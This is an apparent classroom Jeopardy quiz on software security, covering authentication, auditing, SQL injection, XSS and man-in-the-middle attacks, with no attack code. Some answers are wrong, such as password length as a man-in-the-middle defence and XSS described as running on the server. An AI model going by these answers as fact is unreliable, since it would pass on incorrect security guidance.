Software Security Jeopardy Template

Physical and Software Security Controls

Software Auditing and Testing Strategies

Software security & vulnerabilities

Web application risk

100

Uses a username and password to allow authorised access to a system

What is User Authentication?

100

Uses to audit (check/review/test) code written locally, or obtained from an online source

What is software auditing?

100

When personal information is accessed, disclosed without authorisation, or is lost.

What is data breaches?

100

Running malicious SQL commands via unsanitised user input to allow unauthorised users to add/modify/delete contents of the SQL database.

What is SQL injections?

200

Uses to preserve old versions of software to be rolled back if required

What is version control?

200

This causes the software to be vulnerable to many risks

What is malicious or poorly code?

200

Emails might be used for phishing scams and unauthorised access ot customer accounts.

What are some consequences of data breaches?

200

Sanitise/escape user input to remove special characters/delimiters associated with SQL commands to perform immediate actions on the SQLdatabase.

What can you do to prevent SQL injections?

300

Uses to cypher text messages

What is Encryption?

300

Uses to simulate a cyber attack agaisnt the computer system to check for vulnerabilities

What is penetration testing?

300

An attacker interferes an electronical communication and pretends to be the client or the supplier to collect data from the other.

What is a man-in-the-middle attack?

300

Malicious unsanitised code sent from the client to the server via user input is executed on the server and then displayed to the user

What is XSS scripting?

400

Uses to fix errors and improve performance

What is software update?

400

Update the anti-virus software to be up-to-date.

What is a method of reducing risk before downloading a module?

400

Manipulation of the weakest link in a computer system

What is a social engineering?

400

Allows dynamic and interactive content on HTML/CSS webpages.

What is Javascript?

500

Uses to protect the software from virus

What is firewalls and system protection?

500

A method of testing the behaviour of algorithms in pseudocode.

What is trace tables?

500

Consider increasing password length and complexity requirements.

What is a strategy to prevent man-in-the-middle-attack?

500

Sanitise/escape user input to remove special characters and delimiters associated with JavaScript/XSS commands.

What can you do to prevent Javascript/XSS scripting?